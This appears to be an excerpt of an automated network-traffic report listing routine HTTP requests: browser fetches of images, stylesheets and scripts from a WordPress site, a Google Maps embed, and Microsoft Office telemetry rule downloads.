          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/IMAGE-1.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/core.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /maps/embed?pb=!1m18!1m12!1m3!1d3310.269575042676!2d18.506898950722725!3d-33.93419402979206!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x1dcc5c8fde768b55%3A0x739aec15f4472a9f!2sHoward+Terraces!5e0!3m2!1sen!2sza!4v1540463967394 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/products3.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/mission-blue.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/products2.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/logo-COLOUR.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/js_composer_salient/assets/lib/bower/animate-css/animate.min.css?ver=6.9.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/core.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/style-non-critical.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/IMAGE-1.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/plugins/magnific.css?ver=8.6.0 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/off-canvas/core.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/build/off-canvas/fullscreen-legacy.css?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/products2.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/jquery.easing.min.js?ver=1.3 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/products3.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/jquery.mousewheel.min.js?ver=3.1.13 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/jquery.easing.min.js?ver=1.3 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/priority.js?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/intersection-observer.min.js?ver=2.6.2 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/transit.min.js?ver=0.9.9 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/waypoints.js?ver=4.0.2 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/salient-portfolio/js/third-party/imagesLoaded.min.js?ver=4.1.4 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/hoverintent.min.js?ver=1.9 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/jquery.mousewheel.min.js?ver=3.1.13 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/priority.js?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/magnific.js?ver=7.0.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/intersection-observer.min.js?ver=2.6.2 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/salient-core/js/third-party/touchswipe.min.js?ver=1.0 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/salient-portfolio/js/third-party/caroufredsel.min.js?ver=7.0.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/transit.min.js?ver=0.9.9 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/anime.min.js?ver=4.5.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/waypoints.js?ver=4.0.2 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/salient-portfolio/js/third-party/imagesLoaded.min.js?ver=4.1.4 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/elements/nectar-testimonial-slider.js?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
